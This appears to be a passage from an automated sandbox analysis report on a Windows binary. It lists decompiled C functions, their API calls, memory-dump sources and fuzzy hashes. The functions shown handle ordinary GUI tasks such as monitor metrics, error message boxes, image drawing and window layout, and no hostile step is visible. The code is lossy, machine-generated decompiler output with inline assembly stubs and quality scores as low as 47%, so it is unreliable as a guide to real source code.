                                                                                 • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
                                                                                • String ID: DISPLAY$GetMonitorInfo
                                                                                • API String ID: 1539801207-1633989206
                                                                                • Opcode ID: 74e8bace222dfb2b270db7b4bffcb0b6ca3b8f6e865bad805c7d64f7d561bc5d
                                                                                • Instruction ID: eb29b155447e2ea08417c78262e00809df11af4c5ac13398b32b6bfbf337f6c7
                                                                                • Opcode Fuzzy Hash: 74e8bace222dfb2b270db7b4bffcb0b6ca3b8f6e865bad805c7d64f7d561bc5d
                                                                                • Instruction Fuzzy Hash: 4B1127317003106FD7208F68BC4476BB7E9EF06750F51492EE90997680D374A9808B6C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 47%
                                                                                			E0042665C(intOrPtr _a4, intOrPtr* _a8) {
                                                                                				void _v20;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				void* _t23;
                                                                                				int _t24;
                                                                                				intOrPtr _t26;
                                                                                				intOrPtr _t27;
                                                                                				intOrPtr* _t29;
                                                                                				intOrPtr* _t31;
                                                                                
                                                                                				_t29 = _a8;
                                                                                				_t27 = _a4;
                                                                                				if( *0x487ac2 != 0) {
                                                                                					_t24 = 0;
                                                                                					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
                                                                                						 *((intOrPtr*)(_t29 + 4)) = 0;
                                                                                						 *((intOrPtr*)(_t29 + 8)) = 0;
                                                                                						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
                                                                                						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
                                                                                						asm("movsd");
                                                                                						asm("movsd");
                                                                                						asm("movsd");
                                                                                						asm("movsd");
                                                                                						_t31 = _t29;
                                                                                						 *(_t31 + 0x24) = 1;
                                                                                						if( *_t31 >= 0x4c) {
                                                                                							_push("DISPLAY");
                                                                                							_push(_t31 + 0x28);
                                                                                							L00406A28();
                                                                                						}
                                                                                						_t24 = 1;
                                                                                					}
                                                                                				} else {
                                                                                					_t26 =  *0x487aac; // 0x42665c
                                                                                					 *0x487aac = E00426184(6, _t23, _t26, _t27, _t29);
                                                                                					_t24 =  *0x487aac(_t27, _t29);
                                                                                				}
                                                                                				return _t24;
                                                                                			}















                                                                                APIs
                                                                                • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004266B4
                                                                                • GetSystemMetrics.USER32 ref: 004266C9
                                                                                • GetSystemMetrics.USER32 ref: 004266D4
                                                                                • lstrcpy.KERNEL32(?,DISPLAY), ref: 004266FE
                                                                                  • Part of subcall function 00426184: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00426204
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                                                • String ID: DISPLAY$GetMonitorInfoW$\fB
                                                                                • API String ID: 2545840971-2659345030
                                                                                • Opcode ID: a659e7fc353b91a0559fe6c9e12d237e49ac487b5d8c0679176730f51a712352
                                                                                • Instruction ID: e82b1ccf59c43c2d8bf743638305c59c410ee6f05c7b2395847ba50243c0d1fd
                                                                                • Opcode Fuzzy Hash: a659e7fc353b91a0559fe6c9e12d237e49ac487b5d8c0679176730f51a712352
                                                                                • Instruction Fuzzy Hash: 581106327043105FE7208FA5BC447ABB7E8EB45714F52483FEC4597680E774A944CBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 79%
                                                                                			E004041A4(void* __ecx) {
                                                                                				long _v4;
                                                                                				int _t3;
                                                                                
                                                                                				if( *0x487048 == 0) {
                                                                                					if( *0x46b01c == 0) {
                                                                                						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
                                                                                					}
                                                                                					return _t3;
                                                                                				} else {
                                                                                					if( *0x48721c == 0xd7b2 &&  *0x487224 > 0) {
                                                                                						 *0x487234();
                                                                                					}
                                                                                					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
                                                                                					return WriteFile(GetStdHandle(0xfffffff5), E0040422C, 2,  &_v4, 0);
                                                                                				}
                                                                                			}






                                                                                APIs
                                                                                • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,0046AE10,00000000,?,00404272,?,?,?,00000001,00404312,0040283B,00402883,?,00000000), ref: 004041DD
                                                                                • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,0046AE10,00000000,?,00404272,?,?,?,00000001,00404312,0040283B,00402883), ref: 004041E3
                                                                                • GetStdHandle.KERNEL32(000000F5,0040422C,00000002,0046AE10,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0046AE10,00000000,?,00404272), ref: 004041F8
                                                                                • WriteFile.KERNEL32(00000000,000000F5,0040422C,00000002,0046AE10,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0046AE10,00000000,?,00404272), ref: 004041FE
                                                                                • MessageBoxA.USER32 ref: 0040421C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: FileHandleWrite$Message
                                                                                • String ID: Error$Runtime error at 00000000
                                                                                • API String ID: 1570097196-2970929446
                                                                                • Opcode ID: 7542210bf09bc892d3483cc914aad794224dab76ed301de357ef70916d6eaf62
                                                                                • Instruction ID: 3cda8e2fd8faf604d14361e06e5260565932c3c5a82abd22b22224aa19730b8a
                                                                                • Opcode Fuzzy Hash: 7542210bf09bc892d3483cc914aad794224dab76ed301de357ef70916d6eaf62
                                                                                • Instruction Fuzzy Hash: 55F0C2B169434035E62063A46D06F5E26488385B59F204EFFB320F80E293BC98C4476E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 55%
                                                                                			E00442D8C(void* __eax, void* __ecx, intOrPtr __edx, void* __eflags, char _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                				intOrPtr _v8;
                                                                                				struct HDC__* _v12;
                                                                                				char _v28;
                                                                                				char _v44;
                                                                                				void* __edi;
                                                                                				void* __ebp;
                                                                                				void* _t46;
                                                                                				void* _t57;
                                                                                				int _t85;
                                                                                				void* _t119;
                                                                                				void* _t120;
                                                                                				void* _t129;
                                                                                				struct HDC__* _t138;
                                                                                				struct HDC__* _t139;
                                                                                				int _t140;
                                                                                				void* _t141;
                                                                                
                                                                                				_t121 = __ecx;
                                                                                				_t137 = __ecx;
                                                                                				_v8 = __edx;
                                                                                				_t120 = __eax;
                                                                                				_t46 = E00442554(__eax);
                                                                                				if(_t46 != 0) {
                                                                                					_t144 = _a4;
                                                                                					if(_a4 == 0) {
                                                                                						__eflags =  *(_t120 + 0x54);
                                                                                						if( *(_t120 + 0x54) == 0) {
                                                                                							_t140 = E00423960(1);
                                                                                							 *(_t120 + 0x54) = _t140;
                                                                                							E00424D78(_t140, 1);
                                                                                							 *((intOrPtr*)( *_t140 + 0x40))();
                                                                                							_t121 =  *_t140;
                                                                                							 *((intOrPtr*)( *_t140 + 0x34))();
                                                                                						}
                                                                                						E0041F338( *((intOrPtr*)(E00423F28( *(_t120 + 0x54)) + 0x14)), _t121, 0xffffff, _t137, _t141, __eflags);
                                                                                						E00412984(0,  *(_t120 + 0x34), 0,  &_v44,  *(_t120 + 0x30));
                                                                                						_push( &_v44);
                                                                                						_t57 = E00423F28( *(_t120 + 0x54));
                                                                                						_pop(_t129);
                                                                                						E0041F9D0(_t57, _t129);
                                                                                						_push(0);
                                                                                						_push(0);
                                                                                						_push(0xffffffff);
                                                                                						_push(0);
                                                                                						_push(0);
                                                                                						_push(0);
                                                                                						_push(0);
                                                                                						_push(E0041FDC4(E00423F28( *(_t120 + 0x54))));
                                                                                						_push(_v8);
                                                                                						_push(E00442728(_t120));
                                                                                						L004260DC();
                                                                                						E00412984(_a16, _a16 +  *(_t120 + 0x34), _a12,  &_v28, _a12 +  *(_t120 + 0x30));
                                                                                						_v12 = E0041FDC4(E00423F28( *(_t120 + 0x54)));
                                                                                						E0041F338( *((intOrPtr*)(_t137 + 0x14)), _a16 +  *(_t120 + 0x34), 0x80000014, _t137, _t141, __eflags);
                                                                                						_t138 = E0041FDC4(_t137);
                                                                                						SetTextColor(_t138, 0xffffff);
                                                                                						SetBkColor(_t138, 0);
                                                                                						_t85 = _a16 + 1;
                                                                                						__eflags = _t85;
                                                                                						BitBlt(_t138, _t85, _a12 + 1,  *(_t120 + 0x34),  *(_t120 + 0x30), _v12, 0, 0, 0xe20746);
                                                                                						E0041F338( *((intOrPtr*)(_t137 + 0x14)), _a16 +  *(_t120 + 0x34), 0x80000010, _t137, _t141, _t85);
                                                                                						_t139 = E0041FDC4(_t137);
                                                                                						SetTextColor(_t139, 0xffffff);
                                                                                						SetBkColor(_t139, 0);
                                                                                						return BitBlt(_t139, _a16, _a12,  *(_t120 + 0x34),  *(_t120 + 0x30), _v12, 0, 0, 0xe20746);
                                                                                					}
                                                                                					_push(_a8);
                                                                                					_push(E00442350(_t144));
                                                                                					E00442D64(_t120, _t144);
                                                                                					_push(E00442350(_t144));
                                                                                					_push(0);
                                                                                					_push(0);
                                                                                					_push(_a12);
                                                                                					_push(_a16);
                                                                                					_push(E0041FDC4(__ecx));
                                                                                					_push(_v8);
                                                                                					_t119 = E00442728(_t120);
                                                                                					_push(_t119);
                                                                                					L004260DC();
                                                                                					return _t119;
                                                                                				}
                                                                                				return _t46;
                                                                                			}




















                                                                                APIs
                                                                                • 73452430.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 00442DEB
                                                                                • 73452430.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00442E8C
                                                                                • SetTextColor.GDI32(00000000,00FFFFFF), ref: 00442ED9
                                                                                • SetBkColor.GDI32(00000000,00000000), ref: 00442EE1
                                                                                • BitBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746), ref: 00442F06
                                                                                  • Part of subcall function 00442D64: 73452240.COMCTL32(00000000,?,00442DC5,00000000,?), ref: 00442D7A
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: 73452430Color$73452240Text
                                                                                • String ID:
                                                                                • API String ID: 3810274889-0
                                                                                • Opcode ID: f9827d315cdbc4e10fc9f6f4317652b6d712c7bab38ee9153700b76ea893cef0
                                                                                • Instruction ID: 8c7c3c46afd78b8adb657da2d6ce0c39d83e9d96557bbb21b825c40a06f345e7
                                                                                • Opcode Fuzzy Hash: f9827d315cdbc4e10fc9f6f4317652b6d712c7bab38ee9153700b76ea893cef0
                                                                                • Instruction Fuzzy Hash: 3F512B71700115AFDB40EF6DDD82F9E37E8AF09304F50116AF905EB286CA78EC468B69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 73%
                                                                                			E0042E254(void* __eax, void* __ecx, void* __edx) {
                                                                                				signed int _v8;
                                                                                				signed int _v12;
                                                                                				signed int _v16;
                                                                                				intOrPtr _v20;
                                                                                				signed int _v24;
                                                                                				struct HDWP__* _v28;
                                                                                				int _v32;
                                                                                				char _v36;
                                                                                				struct tagTEXTMETRICA _v92;
                                                                                				void* __ebx;
                                                                                				void* __ebp;
                                                                                				intOrPtr _t85;
                                                                                				void* _t89;
                                                                                				void* _t113;
                                                                                				char _t117;
                                                                                				intOrPtr* _t119;
                                                                                				void* _t144;
                                                                                				void* _t146;
                                                                                				signed int _t147;
                                                                                				long _t148;
                                                                                				signed int _t158;
                                                                                				intOrPtr _t160;
                                                                                				struct HDC__* _t175;
                                                                                				int _t176;
                                                                                				void* _t179;
                                                                                				void* _t181;
                                                                                				intOrPtr _t182;
                                                                                				intOrPtr _t188;
                                                                                
                                                                                				_t146 = __ecx;
                                                                                				_t179 = _t181;
                                                                                				_t182 = _t181 + 0xffffffa8;
                                                                                				_t144 = __eax;
                                                                                				_t85 =  *((intOrPtr*)(__eax + 0x210));
                                                                                				if( *((intOrPtr*)(_t85 + 8)) == 0 ||  *((char*)(__eax + 0x220)) != 0) {
                                                                                					return _t85;
                                                                                				} else {
                                                                                					_t175 = GetDC(0);
                                                                                					_t89 = SelectObject(_t175, E0041EB60( *((intOrPtr*)(_t144 + 0x68)), _t144, _t146));
                                                                                					GetTextMetricsA(_t175,  &_v92);
                                                                                					SelectObject(_t175, _t89);
                                                                                					ReleaseDC(0, _t175);
                                                                                					_t176 =  *( *((intOrPtr*)(_t144 + 0x210)) + 8);
                                                                                					_t147 =  *(_t144 + 0x21c);
                                                                                					asm("cdq");
                                                                                					_v8 = (_t176 + _t147 - 1) / _t147;
                                                                                					asm("cdq");
                                                                                					_v12 = ( *((intOrPtr*)(_t144 + 0x48)) - 0xa) / _t147;
                                                                                					_t148 = _v92.tmHeight;
                                                                                					_v24 =  *((intOrPtr*)(_t144 + 0x4c)) - _t148 - 5;
                                                                                					asm("cdq");
                                                                                					_v16 = _v24 / _v8;
                                                                                					asm("cdq");
                                                                                					_t34 = _v24 % _v8;
                                                                                					_t158 = _t34 >> 1;
                                                                                					if(_t34 < 0) {
                                                                                						asm("adc edx, 0x0");
                                                                                					}
                                                                                					_v20 = _t158 + _t148 + 1;
                                                                                					_v28 = BeginDeferWindowPos(_t176);
                                                                                					_push(_t179);
                                                                                					_push(0x42e3dd);
                                                                                					_push( *[fs:eax]);
                                                                                					 *[fs:eax] = _t182;
                                                                                					_t113 =  *( *((intOrPtr*)(_t144 + 0x210)) + 8) - 1;
                                                                                					if(_t113 >= 0) {
                                                                                						_t117 = _t113 + 1;
                                                                                						_t188 = _t117;
                                                                                						_v36 = _t117;
                                                                                						_v24 = 0;
                                                                                						do {
                                                                                							_t119 = E00413FA4( *((intOrPtr*)(_t144 + 0x210)), _v24);
                                                                                							_t172 = _t119;
                                                                                							 *((intOrPtr*)( *_t119 + 0x70))();
                                                                                							asm("cdq");
                                                                                							_v32 = _v24 / _v8 * _v12 + 8;
                                                                                							if(E004037B0(_t119, _t188) != 0) {
                                                                                								_v32 = E004350A4(_t144) - _v32 - _v12;
                                                                                							}
                                                                                							asm("cdq");
                                                                                							_v28 = DeferWindowPos(_v28, E0043BD14(_t172), 0, _v32, _v24 % _v8 * _v16 + _v20, _v12, _v16, 0x14);
                                                                                							E004355C0(_t172, 1);
                                                                                							_v24 = _v24 + 1;
                                                                                							_t81 =  &_v36;
                                                                                							 *_t81 = _v36 - 1;
                                                                                						} while ( *_t81 != 0);
                                                                                					}
                                                                                					_pop(_t160);
                                                                                					 *[fs:eax] = _t160;
                                                                                					_push(0x42e3e4);
                                                                                					return EndDeferWindowPos(_v28);
                                                                                				}
                                                                                			}

                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 0042E27E
                                                                                  • Part of subcall function 0041EB60: CreateFontIndirectA.GDI32(?), ref: 0041EC9E
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0042E28F
                                                                                • GetTextMetricsA.GDI32(00000000,?), ref: 0042E29B
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0042E2A2
                                                                                • ReleaseDC.USER32 ref: 0042E2AA
                                                                                • BeginDeferWindowPos.USER32 ref: 0042E302
                                                                                • DeferWindowPos.USER32(?,00000000,00000000,?,?,?,00000000,?), ref: 0042E3A9
                                                                                • EndDeferWindowPos.USER32(?,0042E3E4,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E3D7
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: DeferWindow$ObjectSelect$BeginCreateFontIndirectMetricsReleaseText
                                                                                • String ID:
                                                                                • API String ID: 1262541054-0
                                                                                • Opcode ID: 04145a869496cb02b33ca182ebaf35b8f27f04055b291b8486f22ebdef0f9f00
                                                                                • Instruction ID: e380a197be4a0b5e9c39d3c693654ceb05a77081704d619803c21c70eeb1f8a7
                                                                                • Opcode Fuzzy Hash: 04145a869496cb02b33ca182ebaf35b8f27f04055b291b8486f22ebdef0f9f00
                                                                                • Instruction Fuzzy Hash: 02414E71A001199FCB00DFAED885BAEBBF5EF48315F14406AF904EB391D678AD01CBA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 74%
                                                                                			E0045227C(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                                                                				intOrPtr* _v8;
                                                                                				intOrPtr _v12;
                                                                                				intOrPtr _v16;
                                                                                				intOrPtr _v20;
                                                                                				short _v22;
                                                                                				intOrPtr _v28;
                                                                                				struct HWND__* _v32;
                                                                                				char _v36;
                                                                                				intOrPtr _t50;
                                                                                				intOrPtr _t58;
                                                                                				intOrPtr _t59;
                                                                                				intOrPtr _t60;
                                                                                				intOrPtr _t63;
                                                                                				intOrPtr _t64;
                                                                                				intOrPtr _t66;
                                                                                				intOrPtr _t68;
                                                                                				intOrPtr _t83;
                                                                                				void* _t88;
                                                                                				intOrPtr _t120;
                                                                                				void* _t122;
                                                                                				void* _t125;
                                                                                				void* _t126;
                                                                                				intOrPtr _t127;
                                                                                
                                                                                				_t123 = __esi;
                                                                                				_t122 = __edi;
                                                                                				_t125 = _t126;
                                                                                				_t127 = _t126 + 0xffffffe0;
                                                                                				_push(__ebx);
                                                                                				_push(__esi);
                                                                                				_v36 = 0;
                                                                                				_v8 = __eax;
                                                                                				_push(_t125);
                                                                                				_push(0x45250c);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t127;
                                                                                				E00433F00();
                                                                                				if( *((char*)(_v8 + 0x57)) != 0 ||  *((intOrPtr*)( *_v8 + 0x50))() == 0 || ( *(_v8 + 0x2ec) & 0x00000008) != 0 ||  *((char*)(_v8 + 0x22f)) == 1) {
                                                                                					_t50 =  *0x486bbc; // 0x41cc7c
                                                                                					E00406520(_t50,  &_v36);
                                                                                					E0040A0B0(_v36, 1);
                                                                                					E00403D80();
                                                                                				}
                                                                                				if(GetCapture() != 0) {
                                                                                					SendMessageA(GetCapture(), 0x1f, 0, 0);
                                                                                				}
                                                                                				ReleaseCapture();
                                                                                				 *(_v8 + 0x2ec) =  *(_v8 + 0x2ec) | 0x00000008;
                                                                                				_v32 = GetActiveWindow();
                                                                                				_t58 =  *0x46bb1c; // 0x0
                                                                                				_v20 = _t58;
                                                                                				_t59 =  *0x487c00; // 0x22e0f1c
                                                                                				_t60 =  *0x487c00; // 0x22e0f1c
                                                                                				E00414020( *((intOrPtr*)(_t60 + 0x7c)),  *((intOrPtr*)(_t59 + 0x78)), 0);
                                                                                				_t63 =  *0x487c00; // 0x22e0f1c
                                                                                				 *((intOrPtr*)(_t63 + 0x78)) = _v8;
                                                                                				_t64 =  *0x487c00; // 0x22e0f1c
                                                                                				_v22 =  *((intOrPtr*)(_t64 + 0x44));
                                                                                				_t66 =  *0x487c00; // 0x22e0f1c
                                                                                				E004536E4(_t66,  *((intOrPtr*)(_t59 + 0x78)), 0);
                                                                                				_t68 =  *0x487c00; // 0x22e0f1c
                                                                                				_v28 =  *((intOrPtr*)(_t68 + 0x48));
                                                                                				_v16 = E0044C690(0, 0x487bfc, _t122, _t123);
                                                                                				_push(_t125);
                                                                                				_push(0x4524ec);
                                                                                				_push( *[fs:edx]);
                                                                                				 *[fs:edx] = _t127;
                                                                                				E004521CC(_v8);
                                                                                				_push(_t125);
                                                                                				_push(0x45244b);
                                                                                				_push( *[fs:edx]);
                                                                                				 *[fs:edx] = _t127;
                                                                                				SendMessageA(E0043BD14(_v8), 0xb000, 0, 0);
                                                                                				 *((intOrPtr*)(_v8 + 0x24c)) = 0;
                                                                                				do {
                                                                                					E0045541C( *0x487bfc, _t122, _t123);
                                                                                					if( *((char*)( *0x487bfc + 0x9c)) == 0) {
                                                                                						if( *((intOrPtr*)(_v8 + 0x24c)) != 0) {
                                                                                							E0045212C(_v8);
                                                                                						}
                                                                                					} else {
                                                                                						 *((intOrPtr*)(_v8 + 0x24c)) = 2;
                                                                                					}
                                                                                					_t83 =  *((intOrPtr*)(_v8 + 0x24c));
                                                                                				} while (_t83 == 0);
                                                                                				_v12 = _t83;
                                                                                				SendMessageA(E0043BD14(_v8), 0xb001, 0, 0);
                                                                                				_t88 = E0043BD14(_v8);
                                                                                				if(_t88 != GetActiveWindow()) {
                                                                                					_v32 = 0;
                                                                                				}
                                                                                				_pop(_t120);
                                                                                				 *[fs:eax] = _t120;
                                                                                				_push(0x452452);
                                                                                				return E004521C4();
                                                                                			}

                                                                                0x00452328
                                                                                0x0045232b
                                                                                0x00452333
                                                                                0x0045233d
                                                                                0x00452342
                                                                                0x0045234a
                                                                                0x0045234d
                                                                                0x00452356
                                                                                0x0045235c
                                                                                0x00452361
                                                                                0x00452366
                                                                                0x0045236e
                                                                                0x00452378
                                                                                0x0045237d
                                                                                0x0045237e
                                                                                0x00452383
                                                                                0x00452386
                                                                                0x0045238c
                                                                                0x00452393
                                                                                0x00452394
                                                                                0x00452399
                                                                                0x0045239c
                                                                                0x004523b1
                                                                                0x004523bb
                                                                                0x004523c1
                                                                                0x004523c3
                                                                                0x004523d1
                                                                                0x004523ec
                                                                                0x004523f1
                                                                                0x004523f1
                                                                                0x004523d3
                                                                                0x004523d6
                                                                                0x004523d6
                                                                                0x004523f9
                                                                                0x004523ff
                                                                                0x00452403
                                                                                0x00452418
                                                                                0x00452420
                                                                                0x0045242e
                                                                                0x00452432
                                                                                0x00452432
                                                                                0x00452437
                                                                                0x0045243a
                                                                                0x0045243d
                                                                                0x0045244a

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                • String ID:
                                                                                • API String ID: 862346643-0
                                                                                • Opcode ID: 6fb19725fa897b49366f234f17a85424d251169073f2b89c6bdeb30c45be70e6
                                                                                • Instruction ID: b629a4e8d731a575979ed138cee1ab300dc18be91145e05793bf1a9acf88d777
                                                                                • Opcode Fuzzy Hash: 6fb19725fa897b49366f234f17a85424d251169073f2b89c6bdeb30c45be70e6
                                                                                • Instruction Fuzzy Hash: EB513030A00204AFD711EF6AC946B9E77F1EF49304F1544BAF904AB3A2D778AD44DB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00439DF0(void* __eax, void* __ecx, struct HDC__* __edx, void* __eflags, intOrPtr _a4) {
                                                                                				int _v8;
                                                                                				int _v12;
                                                                                				int _v16;
                                                                                				char _v20;
                                                                                				struct tagRECT _v36;
                                                                                				signed int _t54;
                                                                                				intOrPtr _t59;
                                                                                				int _t61;
                                                                                				void* _t63;
                                                                                				void* _t66;
                                                                                				void* _t82;
                                                                                				int _t98;
                                                                                				struct HDC__* _t99;
                                                                                
                                                                                				_t99 = __edx;
                                                                                				_t82 = __eax;
                                                                                				 *(__eax + 0x54) =  *(__eax + 0x54) | 0x00000080;
                                                                                				_v16 = SaveDC(__edx);
                                                                                				E00433FDC(__edx, _a4, __ecx);
                                                                                				IntersectClipRect(__edx, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
                                                                                				_t98 = 0;
                                                                                				_v12 = 0;
                                                                                				if((GetWindowLongA(E0043BD14(_t82), 0xffffffec) & 0x00000002) == 0) {
                                                                                					_t54 = GetWindowLongA(E0043BD14(_t82), 0xfffffff0);
                                                                                					__eflags = _t54 & 0x00800000;
                                                                                					if((_t54 & 0x00800000) != 0) {
                                                                                						_v12 = 3;
                                                                                						_t98 = 0xa00f;
                                                                                					}
                                                                                				} else {
                                                                                					_v12 = 0xa;
                                                                                					_t98 = 0x200f;
                                                                                				}
                                                                                				if(_t98 != 0) {
                                                                                					SetRect( &_v36, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
                                                                                					DrawEdge(_t99,  &_v36, _v12, _t98);
                                                                                					E00433FDC(_t99, _v36.top, _v36.left);
                                                                                					IntersectClipRect(_t99, 0, 0, _v36.right - _v36.left, _v36.bottom - _v36.top);
                                                                                				}
                                                                                				E00436848(_t82, _t99, 0x14, 0);
                                                                                				E00436848(_t82, _t99, 0xf, 0);
                                                                                				_t59 =  *((intOrPtr*)(_t82 + 0x19c));
                                                                                				if(_t59 == 0) {
                                                                                					L12:
                                                                                					_t61 = RestoreDC(_t99, _v16);
                                                                                					 *(_t82 + 0x54) =  *(_t82 + 0x54) & 0x0000ff7f;
                                                                                					return _t61;
                                                                                				} else {
                                                                                					_t63 =  *((intOrPtr*)(_t59 + 8)) - 1;
                                                                                					if(_t63 < 0) {
                                                                                						goto L12;
                                                                                					}
                                                                                					_v20 = _t63 + 1;
                                                                                					_v8 = 0;
                                                                                					do {
                                                                                						_t66 = E00413FA4( *((intOrPtr*)(_t82 + 0x19c)), _v8);
                                                                                						_t107 =  *((char*)(_t66 + 0x57));
                                                                                						if( *((char*)(_t66 + 0x57)) != 0) {
                                                                                							E00439DF0(_t66,  *((intOrPtr*)(_t66 + 0x40)), _t99, _t107,  *((intOrPtr*)(_t66 + 0x44)));
                                                                                						}
                                                                                						_v8 = _v8 + 1;
                                                                                						_t36 =  &_v20;
                                                                                						 *_t36 = _v20 - 1;
                                                                                					} while ( *_t36 != 0);
                                                                                					goto L12;
                                                                                				}
                                                                                			}

                                                                                APIs
                                                                                • SaveDC.GDI32 ref: 00439E06
                                                                                  • Part of subcall function 00433FDC: GetWindowOrgEx.GDI32(?), ref: 00433FEA
                                                                                  • Part of subcall function 00433FDC: SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 00434000
                                                                                • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00439E27
